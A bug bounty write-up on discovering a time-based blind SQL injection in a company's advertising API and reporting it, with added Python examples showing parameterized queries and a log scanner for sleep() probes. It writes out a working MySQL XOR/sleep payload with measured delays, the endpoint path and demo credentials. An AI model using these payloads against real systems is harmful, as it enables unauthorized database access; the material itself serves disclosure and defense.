How I found a bug in a company's system and got a $500 bounty
Hello everyone,
I found a SQL injection in a company's advertising system.
First, I used the Subfinder tool to enumerate all the subdomains of the domain:
I got a subdomain with a login page:
I tried to scan it, so I used the Burp Suite tool:
After logging in with the username demo and password demo, the page's JavaScript makes a GET request to this API endpoint:
https://demo.xxxx.com/api/advertiser/tracking-question?company_uid=p5b4c46b09fb0d2&limit=50&offset=0
I tried adding ' or " to the company_uid parameter,
but nothing happened, so I tried time-based SQL injection:
I tried this payload: 0"XOR(if(now()=sysdate(),sleep(20),0))XOR"Z
and the server took 20 seconds to return the data to me.
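Why that payload changes the query, and what the fix looks like, as an added example (not the company's code and not from the write-up). The table and column names are assumptions, since the real schema is not public; the payload and the company_uid value are the ones above. The unsafe query is only built as text and never executed: its leading " closes the double-quoted literal the server opened (which is also why the single-quote probe did nothing), XOR(...) then runs as SQL, and the trailing "Z opens a new literal so the statement still parses. The parameterized version binds the same input as data, so the database never sees it as SQL:

```python
import sqlite3

# Payload from the write-up and a constructed valid company_uid.
PAYLOAD = '0"XOR(if(now()=sysdate(),sleep(20),0))XOR"Z'
VALID_UID = "p5b4c46b09fb0d2"

# Assumed schema: the company's real table and columns are not public.
TABLE_SQL = ("CREATE TABLE tracking_question "
             "(id INTEGER PRIMARY KEY, company_uid TEXT, question TEXT)")


def build_query_unsafe(company_uid: str) -> str:
    """The defect: the parameter is pasted into the SQL text with string formatting.
    Built as text only; this function never runs the statement."""
    return (f'SELECT id FROM tracking_question WHERE company_uid = "{company_uid}" '
            f'LIMIT 50 OFFSET 0')


def sql_outside_literals(query: str) -> str:
    """Strip double-quoted literals so only the text the database parses as SQL remains."""
    out, in_literal = [], False
    for ch in query:
        if ch == '"':
            in_literal = not in_literal
        elif not in_literal:
            out.append(ch)
    return "".join(out)


def query_safe(conn: sqlite3.Connection, company_uid: str,
               limit: int = 50, offset: int = 0) -> list:
    """The fix: bound parameters; the driver sends the value as data, never as SQL."""
    cur = conn.execute(
        "SELECT id FROM tracking_question WHERE company_uid = ? LIMIT ? OFFSET ?",
        (company_uid, limit, offset),
    )
    return [row[0] for row in cur.fetchall()]


def demo_db() -> sqlite3.Connection:
    """In-memory database with one constructed row for the valid company_uid."""
    conn = sqlite3.connect(":memory:")
    conn.execute(TABLE_SQL)
    conn.execute("INSERT INTO tracking_question VALUES (1, ?, 'constructed row')",
                 (VALID_UID,))
    return conn


if __name__ == "__main__":
    # With a normal uid nothing but the fixed SQL text is outside the literal.
    print(sql_outside_literals(build_query_unsafe(VALID_UID)))
    # With the payload, sleep(20) sits outside any literal, i.e. it is executed as SQL.
    print(sql_outside_literals(build_query_unsafe(PAYLOAD)))
    conn = demo_db()
    print(query_safe(conn, VALID_UID))  # [1]
    print(query_safe(conn, PAYLOAD))    # []  the payload is just a string that matches nothing
```

The same parameter binding applies to the limit and offset values, which the endpoint also takes from the request.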
With sleep(12) the response takes 12 seconds to load the page, and with sleep(20) the browser and the Burp response show the page after 20 seconds. The response times I measured (in seconds) were:
- 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z => 12.508
- 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z => 12.543
- 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.523
- 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.565
- 0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.518
- 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.502
- 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z => 12.491
- 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.508
- 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.695
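The series above is the evidence that matters: the response time tracks the requested delay, and the sleep(0) controls stay sub-second. The same correlation is what a defender can look for in access logs. The following is an added example, not part of the write-up and not the company's tooling: it parses constructed log lines (the endpoint path and the response times are taken from the write-up; the client IP, timestamps and byte counts are made up, and the last field is assumed to be the response time in seconds, as nginx's $request_time would give), finds query parameters that carry a sleep(n) call, and reports a parameter as confirmed only when the observed time actually matched a non-zero requested delay:

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed log lines: combined format with the response time (seconds) appended.
PROBE = "0%22XOR(if(now()%3Dsysdate()%2Csleep({n})%2C0))XOR%22Z"
ENDPOINT = "/api/advertiser/tracking-question?company_uid={uid}&limit=50&offset=0"


def _line(uid: str, rt: float, sec: int) -> str:
    return ('203.0.113.7 - - [19/Mar/2021:10:00:%02d +0000] "GET %s HTTP/1.1" 200 512 %.3f'
            % (sec, ENDPOINT.format(uid=uid), rt))


LOG_LINES = [
    _line("p5b4c46b09fb0d2", 0.210, 1),      # ordinary request from a real client
    _line(PROBE.format(n=12), 12.508, 2),    # timings below are the write-up's values
    _line(PROBE.format(n=12), 12.543, 3),
    _line(PROBE.format(n=0), 0.523, 4),
    _line(PROBE.format(n=6), 6.565, 5),
    _line(PROBE.format(n=3), 3.518, 6),
    _line(PROBE.format(n=0), 0.502, 7),
    _line(PROBE.format(n=12), 12.491, 8),
    _line(PROBE.format(n=6), 6.508, 9),
    _line(PROBE.format(n=0), 0.695, 10),
]

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
                    r'(?P<status>\d{3}) \d+ (?P<rt>[\d.]+)\s*$')
SLEEP_RE = re.compile(r'\bsleep\(\s*(\d+(?:\.\d+)?)\s*\)', re.IGNORECASE)


def analyse_line(line: str, tolerance: float = 1.0):
    """Return a finding dict if any query parameter carries sleep(n), else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    observed = float(m.group("rt"))
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:  # parse_qs has already percent-decoded the value
            hit = SLEEP_RE.search(value)
            if hit:
                requested = float(hit.group(1))
                return {
                    "param": name,
                    "requested": requested,
                    "observed": observed,
                    # sleep(0) controls cannot confirm anything, hence requested > 0
                    "delay_matched": requested > 0 and abs(observed - requested) <= tolerance,
                }
    return None


def confirmed_params(lines, tolerance: float = 1.0) -> set:
    """Parameters for which at least one requested delay was reflected in the response time."""
    confirmed = set()
    for line in lines:
        finding = analyse_line(line, tolerance)
        if finding and finding["delay_matched"]:
            confirmed.add(finding["param"])
    return confirmed


if __name__ == "__main__":
    for line in LOG_LINES:
        finding = analyse_line(line)
        if finding:
            print("%-12s requested=%5.1fs observed=%6.3fs matched=%s"
                  % (finding["param"], finding["requested"], finding["observed"],
                     finding["delay_matched"]))
    print("confirmed injectable parameters:", confirmed_params(LOG_LINES))
```

A parameter that merely contains sleep(n) is a probe worth alerting on; one where the delay is reflected in the response time is a confirmed injection point and should be treated as an incident, not just noise from a scanner.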
I decided to run the SQLMap tool:
After 5 minutes I got this info:
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
number of databases: 10
I decided to stop there so as not to breach the company's privacy policy, and contacted the company at their email address,
and got a reply from them :)
19/03/2021: found the bug and contacted the company
20/03/2021: the bug was fixed
20/03/2021: rechecked and confirmed the fix
23/03/2021: received the bounty ($500)